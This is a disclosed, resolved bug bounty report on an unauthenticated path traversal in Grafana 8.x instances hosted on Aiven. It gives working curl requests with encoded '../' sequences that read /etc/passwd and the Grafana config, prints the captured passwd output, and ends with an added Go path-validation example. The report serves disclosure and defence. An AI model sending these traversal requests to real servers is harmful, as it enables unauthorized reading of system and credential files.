Zero day path traversal vulnerability in Grafana 8.x allows unauthenticated arbitrary local file read
Severity: High
Vulnerability Details
## Summary:
Hi team,
I've found a path traversal issue in the Grafana instances hosted on the Aiven platforms. With the path traversal it's possible for an unauthenticated user to read arbitrary files on the server.
## Steps To Reproduce:
1. Login at https://console.aiven.io
1. Create a new Grafana instance and wait till it's up and running
1. Run the following curl command to get the content of the /etc/passwd file on the server:
```
curl https://grafana-303ca6f8-████.aivencloud.com/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
```
Output:
```
$ curl https://grafana-303ca6f8-███████.aivencloud.com/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
███
█████
██████
██████████
██████████
████████
██████
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-coredump:x:992:991:systemd Core Dumper:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
systemd-timesync:x:991:990:systemd Time Synchronization:/:/sbin/nologin
██████████
dbus:x:81:81:System message bus:/:/sbin/nologin
█████
████████
██████
█████████
██████████
███
██████████
███
█████
█████████
██████████
███
███
████
███
```
Some other examples:
See the Grafana config:
```
curl --path-as-is https://grafana-303ca6f8-█████████.aivencloud.com/public/plugins/mysql/../../../../../../../../../../../../usr/share/grafana/conf/defaults.ini
```
I'll keep my Grafana instance running so you can try to reproduce it with the examples above.
## Impact
An unauthenticated user can get access to all system files if he knows the exact path of the file.
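The defensive counterpart to the request shown above, added here as an illustration and not code from this report or from Grafana: a static-asset handler must percent-decode the requested asset, join it onto the plugin directory, and then verify that the resolved path is still inside that directory, so `..%2F..%2Fetc%2Fpasswd` is refused instead of being served. The base directory `/srv/grafana/plugins/mysql` is a constructed placeholder.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path/filepath"
	"strings"
)

// ErrTraversal is returned when a requested asset resolves outside the plugin directory.
var ErrTraversal = errors.New("asset path escapes plugin directory")

// ResolvePluginAsset maps the <asset> part of /public/plugins/<plugin>/<asset>
// onto the filesystem below baseDir and rejects anything that escapes it.
// Percent-encoding is decoded first so that "..%2F" and "../" are treated alike.
// Symlinks inside baseDir are not resolved here; a real handler should also
// apply filepath.EvalSymlinks before opening the file.
func ResolvePluginAsset(baseDir, asset string) (string, error) {
	decoded, err := url.PathUnescape(asset)
	if err != nil {
		return "", fmt.Errorf("malformed asset path: %w", err)
	}
	// NUL bytes and backslashes are never legitimate in an asset name.
	if strings.ContainsAny(decoded, "\x00\\") {
		return "", ErrTraversal
	}
	root := filepath.Clean(baseDir)
	target := filepath.Join(root, decoded) // Join collapses ".." segments
	rel, err := filepath.Rel(root, target)
	if err != nil || rel == ".." || strings.HasPrefix(rel, "../") {
		return "", ErrTraversal
	}
	if rel == "." {
		return "", errors.New("asset path required")
	}
	return target, nil
}

func main() {
	base := "/srv/grafana/plugins/mysql" // constructed placeholder, not a real Grafana path
	for _, a := range []string{"img/logo.svg", "..%2F..%2F..%2F..%2Fetc%2Fpasswd"} {
		p, err := ResolvePluginAsset(base, a)
		fmt.Printf("%-40s -> %q err=%v\n", a, p, err)
	}
}
```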
Report Stats
- Report ID: 1415820
- State: Closed
- Substate: resolved
- Upvotes: 103